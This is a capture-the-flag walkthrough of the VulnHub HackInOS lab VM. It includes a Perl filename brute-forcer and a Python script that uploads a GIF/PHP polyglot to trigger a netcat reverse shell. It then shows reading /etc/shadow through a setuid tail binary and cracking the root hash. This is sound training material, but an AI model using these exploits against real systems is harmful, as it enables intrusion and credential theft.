Monday, October 14, 2019

VulnHub: HackInOS Walkthrough

Let's start off with an nmap scan of the remote host.

root@ubuntu:~# nmap -sS -sV -sC -O -T5 -Pn 192.168.0.35

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-14 16:37 MDT
Nmap scan report for 192.168.0.35
Host is up (0.00060s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:c1:5c:20:9a:77:54:f8:a3:41:18:92:1b:1e:e5:35 (RSA)
|   256 df:d4:f2:61:89:61:ac:e0:ee:3b:5d:07:0d:3f:0c:87 (ECDSA)
|_  256 8b:e4:45:ab:af:c8:0e:7e:2a:e4:47:e7:52:f9:bc:71 (EdDSA)
8000/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.0.3
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 2 disallowed entries 
|_/upload.php /uploads
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blog – Just another WordPress site
MAC Address: 08:00:27:20:A9:BC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.35 seconds
root@ubuntu:~# 

Nmap gives us a couple of interesting results. Port 8000 runs Apache 2.4.25 serving what looks like a default WordPress 5.0.3 site, and robots.txt lists two disallowed entries. Let's look at robots.txt first.

http://192.168.0.35:8000/robots.txt

User-agent:*
Disallow:/upload.php
Disallow:/uploads

We get a 403 Forbidden on the /uploads directory (directory listing is denied), but upload.php itself is accessible. Viewing the source of upload.php reveals a hint: a link to the script's source code on GitHub.

https://github.com/fatihhcelik/Vulnerable-Machine---Hint/blob/master/upload.php

This is the source code of upload.php, and it has a couple of vulnerabilities. The first thing that stands out is how the stored filename is derived:

$rand_number = rand(1,100);
$target_dir = "uploads/";
$target_file = $target_dir . md5(basename($_FILES["file"]["name"].$rand_number));
$file_name = $target_dir . basename($_FILES["file"]["name"]);

It takes the uploaded file's name, appends a random number (rand(1,100) is inclusive, so one of 100 values), and stores the file under the MD5 hex digest of that string; the rest of the script keeps the original extension, which is why the candidates below end in .php. That leaves only 100 possible names for a given upload, so we can simply request every candidate under /uploads/ and see which one answers. The Perl script below does that:

#!/usr/bin/env perl
# Enumerate /uploads/ for md5(<name> . <n>) . ".php", n = 0..100, and report hits.
use strict;
use warnings;
use Digest::MD5 qw(md5_hex);
use LWP::UserAgent;

my $host = "http://192.168.0.35:8000";
my $file = "php-reverse-shell.php";   # name the shell was uploaded with

my $ua = LWP::UserAgent->new(timeout => 10);

# rand(1,100) is inclusive on both ends; 0 is thrown in for good measure.
my @candidates = map { md5_hex($file . $_) . ".php" } (0..100);

foreach my $candidate (@candidates) {
    my $url = "$host/uploads/$candidate";
    my $res = $ua->get($url);

    if ($res->code == 200) {
        print "[+] Page Found (200) OK: $url\n";
    }
}

Next is the file type check. The script decides whether the upload is an image by looking at the MIME type PHP's getimagesize() derives from the file's leading bytes, not at the extension or at anything the client claims. Prepending the GIF signature GIF89a to our PHP code is enough to make getimagesize() report image/gif and pass the check, while the file keeps its .php extension so Apache still executes it. For the shell I chose the connect-back shell from pentestmonkey.net.

if($check["mime"] == "image/png" || $check["mime"] == "image/gif")

Now we start a listener, upload the file, and run the script written earlier to find the name it was stored under. Requesting the discovered URL executes the shell, and the target connects back to our machine.

root@ubuntu:~# nc -v -l -p 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 192.168.0.35 54446 received!
Linux 1afdd1f6b82c 4.15.0-29-generic #31~16.04.1-Ubuntu SMP Wed Jul 18 08:54:04 UTC 2018 x86_64 GNU/Linux
 23:37:18 up  1:02,  0 users,  load average: 0.08, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$   
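As an added example (not from the original post or the VM's source), here are the same two steps in Python: build the GIF/PHP polyglot, push it through upload.php, then probe /uploads/ for every md5(name . n).php candidate. The multipart field name "file" and the accompanying "submit" field are assumptions about the upload form that the page does not show; so is the assumption that the stored file keeps its original extension. It also handles the case the Perl script does not: a non-forking reverse shell keeps the HTTP request open, so the correct name can show up as a timeout rather than a 200.

```python
#!/usr/bin/env python3
"""Upload a GIF/PHP polyglot through upload.php and find where it landed.

Added example for this walkthrough, not the VM author's code. Assumed (not
shown on the page): the form posts a multipart field named "file" plus a
"submit" field, and the stored file keeps its extension, i.e.
uploads/<md5(name . rand)>.<ext>.
"""
import hashlib
import sys
import urllib.error
import urllib.request
import uuid

GIF_MAGIC = b"GIF89a"


def build_polyglot(php_source: bytes) -> bytes:
    """Prefix PHP source with a GIF signature.

    getimagesize() picks the MIME type from the leading signature, so the
    result is reported as image/gif; PHP only interprets the <?php ... ?>
    part and emits the header as literal output.
    """
    return GIF_MAGIC + b"\n" + php_source


def candidate_names(filename: str, low: int = 1, high: int = 100) -> list:
    """Every value md5(basename(filename . $rand_number)) . ext can take.

    PHP's rand(low, high) is inclusive on both ends, hence high + 1.
    """
    ext = filename.rsplit(".", 1)[-1]
    return [
        hashlib.md5(f"{filename}{n}".encode()).hexdigest() + "." + ext
        for n in range(low, high + 1)
    ]


def multipart_body(field: str, filename: str, data: bytes, extra: dict):
    """Hand-rolled multipart/form-data body; returns (body, boundary)."""
    boundary = uuid.uuid4().hex
    parts = []
    for name, value in extra.items():
        parts.append(
            f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"'
            f"\r\n\r\n{value}\r\n".encode()
        )
    parts.append(
        f'--{boundary}\r\nContent-Disposition: form-data; name="{field}"; '
        f'filename="{filename}"\r\nContent-Type: image/gif\r\n\r\n'.encode()
        + data + b"\r\n"
    )
    parts.append(f"--{boundary}--\r\n".encode())
    return b"".join(parts), boundary


def upload(host: str, filename: str, data: bytes) -> str:
    """POST the file to upload.php and return the server's response text."""
    body, boundary = multipart_body("file", filename, data, {"submit": "Upload"})
    req = urllib.request.Request(host + "/upload.php", data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def http_status(url: str):
    """GET url; return the HTTP status, or None if the request hung/failed."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
    except OSError:          # timeout, connection reset, refused, ...
        return None


def find_uploaded(host: str, filename: str, probe=http_status):
    """First /uploads/ candidate that answers 200 or hangs (None), else None.

    A hang is counted as a hit because a reverse shell that cannot fork
    blocks the HTTP response for as long as the shell lives. probe is
    injectable so the search logic can be exercised offline.
    """
    for name in candidate_names(filename):
        url = f"{host}/uploads/{name}"
        if probe(url) in (200, None):
            return url
    return None


if __name__ == "__main__":
    # usage: python3 hackinos_upload.py http://192.168.0.35:8000 php-reverse-shell.php
    target_host, shell_path = sys.argv[1], sys.argv[2]
    shell_name = shell_path.rsplit("/", 1)[-1]
    with open(shell_path, "rb") as fh:
        payload = build_polyglot(fh.read())
    print(upload(target_host, shell_name, payload))
    hit = find_uploaded(target_host, shell_name)
    print("[+] shell stored at", hit if hit else "<not found>")
```

Start the nc listener before running it: the probe that finds the right name is also the request that executes the shell.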

We check /etc/passwd for any additional users on the system that might be of interest to us.

www-data@1afdd1f6b82c:/home$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
www-data@1afdd1f6b82c:/home$ 

No other user on the system has a login shell, so next we search for setuid binaries.

www-data@1afdd1f6b82c:/home$ find / -xdev -perm -4000 -type f 2>/dev/null
find / -xdev -perm -4000 -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/tail
/usr/bin/chfn
/bin/mount
/bin/umount
/bin/su
www-data@1afdd1f6b82c:/home$ 

The tail utility is setuid (and, as the next step confirms, owned by root). Since it runs with root's privileges no matter who invokes it, it can read any file on the system, including /etc/shadow, so we can pull out the root password hash for offline cracking. tail -n25 prints the last 25 lines, which here is the whole file; tail -n +1 would dump a file of any length.

www-data@1afdd1f6b82c:/home$ tail -n25 /etc/shadow
tail -n25 /etc/shadow
root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::
daemon:*:17931:0:99999:7:::
bin:*:17931:0:99999:7:::
sys:*:17931:0:99999:7:::
sync:*:17931:0:99999:7:::
games:*:17931:0:99999:7:::
man:*:17931:0:99999:7:::
lp:*:17931:0:99999:7:::
mail:*:17931:0:99999:7:::
news:*:17931:0:99999:7:::
uucp:*:17931:0:99999:7:::
proxy:*:17931:0:99999:7:::
www-data:*:17931:0:99999:7:::
backup:*:17931:0:99999:7:::
list:*:17931:0:99999:7:::
irc:*:17931:0:99999:7:::
gnats:*:17931:0:99999:7:::
nobody:*:17931:0:99999:7:::
_apt:*:17931:0:99999:7:::
www-data@1afdd1f6b82c:/home$ 

Once we have the hash, we fire up John the Ripper with the rockyou wordlist and start cracking.

root@ubuntu:~/src/JohnTheRipper/run# ./john --wordlist=/home/sam/wordlists/rockyou.txt /home/sam/hackinos.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
john             (root)
1g 0:00:00:03 DONE (2019-10-14 17:46) 0.2702g/s 1798p/s 1798c/s 1798C/s honeybear..98765432
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@ubuntu:~/src/JohnTheRipper/run# 

Cracking took only a few seconds; the root password is simply "john". Let's su to root from our www-data shell.

www-data@1afdd1f6b82c:/home$ su root
su root
Password: john

root@1afdd1f6b82c:/home# id
id
uid=0(root) gid=0(root) groups=0(root)
root@1afdd1f6b82c:/home# whoami
whoami
root
root@1afdd1f6b82c:/home# 

Success! Now let's look for a flag in the /root directory of the host.

root@1afdd1f6b82c:/home# cd /root
cd /root
root@1afdd1f6b82c:~# ls -la
ls -la
total 36
drwx------ 1 root root 4096 Mar  1  2019 .
drwxr-xr-x 1 root root 4096 Feb 23  2019 ..
-rw------- 1 root root   57 Mar  1  2019 .bash_history
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 2 root root 4096 Feb 24  2019 .nano
-rw-rw-rw- 1 root root   28 Feb 28  2019 .port
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-r--r-- 1 root root  169 Feb  9  2019 .wget-hsts
-rw-r--r-- 1 root root   27 Feb 28  2019 flag
root@1afdd1f6b82c:~# cat flag
cat flag
Life consists of details..
root@1afdd1f6b82c:~# 
